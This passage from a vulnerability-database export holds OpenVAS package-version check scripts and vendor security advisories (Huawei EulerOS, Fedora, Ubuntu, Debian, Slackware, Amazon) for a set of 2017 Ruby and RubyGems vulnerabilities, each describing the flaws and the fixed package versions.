script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1407)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1407\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1407\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2019-1407 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module.(CVE-2017-17405)\n\nThe 'lazy_initialize' function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands.(CVE-2017-17790)\n\nIt was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary.(CVE-2017-0900)\n\nIt was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory.(CVE-2017-0901)\n\nA vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain.(CVE-2017-0902)\n\nA vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences.(CVE-2017-0899)\n\nA buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the inter preter's heap memory.(CVE-2017-14064)\n\nIt was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences.(CVE-2017-10784)\n\nIt was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service.(CVE-2017-14033)\n\nA buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter.(CVE-2017-0898)\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter.(CVE-2017-0903)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14.1~33.h11\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-29T00:00:00", "id": "OPENVAS:1361412562310873953", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873953", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2017-6e6f4f95e6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_6e6f4f95e6_ruby_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ruby FEDORA-2017-6e6f4f95e6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873953\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-29 08:05:08 +0100 (Fri, 29 Dec 2017)\");\n script_cve_id(\"CVE-2017-14033\", \"CVE-2017-10784\", \"CVE-2017-0898\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ruby FEDORA-2017-6e6f4f95e6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-6e6f4f95e6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X3U6T42QITZNKC5KGDDMYAR4OS4TWYJ2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.4.2~84.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2017-0902", "CVE-2017-14064", "CVE-2017-0901"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-09-16T00:00:00", "id": "OPENVAS:1361412562310873376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873376", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2017-e136d63c99", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_e136d63c99_ruby_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ruby FEDORA-2017-e136d63c99\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873376\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-16 07:45:07 +0200 (Sat, 16 Sep 2017)\");\n script_cve_id(\"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\",\n \"CVE-2017-14064\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ruby FEDORA-2017-e136d63c99\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ruby on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-e136d63c99\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UFJE2REXNRTPGIHSNPRSAWTVCLFMRJZT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.3.4~64.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10784", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310843684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843684", "type": "openvas", "title": "Ubuntu Update for ruby2.3 USN-3528-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3528_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ruby2.3 USN-3528-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843684\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17790\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:06:44 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"Ubuntu Update for ruby2.3 USN-3528-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3528-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3528-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.3'\n package(s) announced via the USN-3528-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Ruby incorrectly handled certain terminal\nemulator escape sequences. An attacker could use this to execute\narbitrary code via a crafted user name. This issue only affected Ubuntu\n16.04 LTS and Ubuntu 17.10. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain strings.\nAn attacker could use this to cause a denial of service. This issue\nonly affected Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled some generating JSON.\nAn attacker could use this to possible expose sensitive information.\nThis issue only affected Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-14064)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to execute arbitrary code.\n(CVE-2017-17790)\");\n\n script_tag(name:\"affected\", value:\"ruby2.3 on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.484-2ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.1-2~16.04.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.1-2~16.04.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033"], "description": "Several vulnerabilities have been discovered in the interpreter for the\nRuby language. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2017-0898\naerodudrizzt reported a buffer underrun vulnerability in the sprintf\nmethod of the Kernel module resulting in heap memory corruption or\ninformation disclosure from the heap.\n\nCVE-2017-0903\nMax Justicz reported that RubyGems is prone to an unsafe object\ndeserialization vulnerability. When parsed by an application which\nprocesses gems, a specially crafted YAML formatted gem specification\ncan lead to remote code execution.\n\nCVE-2017-10784\nYusuke Endoh discovered an escape sequence injection vulnerability\nin the Basic authentication of WEBrick. An attacker can take\nadvantage of this flaw to inject malicious escape sequences to the\nWEBrick log and potentially execute control characters on the\nvictim", "modified": "2019-03-18T00:00:00", "published": "2017-11-11T00:00:00", "id": "OPENVAS:1361412562310704031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704031", "type": "openvas", "title": "Debian Security Advisory DSA 4031-1 (ruby2.3 - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_4031.nasl 14284 2019-03-18 15:02:15Z cfischer $\n#\n# Auto-generated from advisory DSA 4031-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704031\");\n script_version(\"$Revision: 14284 $\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\");\n script_name(\"Debian Security Advisory DSA 4031-1 (ruby2.3 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 16:02:15 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-11 00:00:00 +0100 (Sat, 11 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2017/dsa-4031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"ruby2.3 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u2.\n\nWe recommend that you upgrade your ruby2.3 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the interpreter for the\nRuby language. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2017-0898\naerodudrizzt reported a buffer underrun vulnerability in the sprintf\nmethod of the Kernel module resulting in heap memory corruption or\ninformation disclosure from the heap.\n\nCVE-2017-0903\nMax Justicz reported that RubyGems is prone to an unsafe object\ndeserialization vulnerability. When parsed by an application which\nprocesses gems, a specially crafted YAML formatted gem specification\ncan lead to remote code execution.\n\nCVE-2017-10784\nYusuke Endoh discovered an escape sequence injection vulnerability\nin the Basic authentication of WEBrick. An attacker can take\nadvantage of this flaw to inject malicious escape sequences to the\nWEBrick log and potentially execute control characters on the\nvictim's terminal emulator when reading logs.\n\nCVE-2017-14033\nasac reported a buffer underrun vulnerability in the OpenSSL\nextension. A remote attacker can take advantage of this flaw to\ncause the Ruby interpreter to crash leading to a denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3-dev\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3-doc\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3-tcltk\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "description": "New ruby packages are available for Slackware 14.2 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ruby-2.2.8-i586-1_slack14.2.txz: Upgraded.\n This release includes several security fixes.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0898\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0899\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0900\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0901\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0902\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10784\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14033\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14064\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ruby-2.2.8-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ruby-2.2.8-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/ruby-2.4.2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/ruby-2.4.2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\n2075dcd60f69c74746bbafa2815bfaf3 ruby-2.2.8-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n32c1da6bf7c4fcd43bad4c0f8bbba9f4 ruby-2.2.8-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n989ad7b1339640d49d7bae34adae727a d/ruby-2.4.2-i586-1.txz\n\nSlackware x86_64 -current package:\nb19b4191baf1c0e340a1f1d5c4034b4c d/ruby-2.4.2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-2.2.8-i586-1_slack14.2.txz", "modified": "2017-09-18T19:20:47", "published": "2017-09-18T19:20:47", "id": "SSA-2017-261-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.371069", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "description": "**Issue Overview:**\n\nArbitrary heap exposure during a JSON.generate call \nRuby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a &#x27;\\\\\\0&#x27; byte, returning a pointer to a string of length zero, which is not the length stored in space_len. ([CVE-2017-14064 __](<https://access.redhat.com/security/cve/CVE-2017-14064>))\n\nEscape sequence injection vulnerability in the Basic authentication of WEBrick \nThe Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name. ([CVE-2017-10784 __](<https://access.redhat.com/security/cve/CVE-2017-10784>))\n\nBuffer underrun in OpenSSL ASN1 decode \nThe decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string. ([CVE-2017-14033 __](<https://access.redhat.com/security/cve/CVE-2017-14033>))\n\nNo size limit in summary length of gem spec \nRubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command. ([CVE-2017-0900 __](<https://access.redhat.com/security/cve/CVE-2017-0900>))\n\nArbitrary file overwrite due to incorrect validation of specification name \nRubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem. ([CVE-2017-0901 __](<https://access.redhat.com/security/cve/CVE-2017-0901>))\n\nDNS hijacking vulnerability \nRubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls. ([CVE-2017-0902 __](<https://access.redhat.com/security/cve/CVE-2017-0902>))\n\nBuffer underrun vulnerability in Kernel.sprintf \nRuby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap. 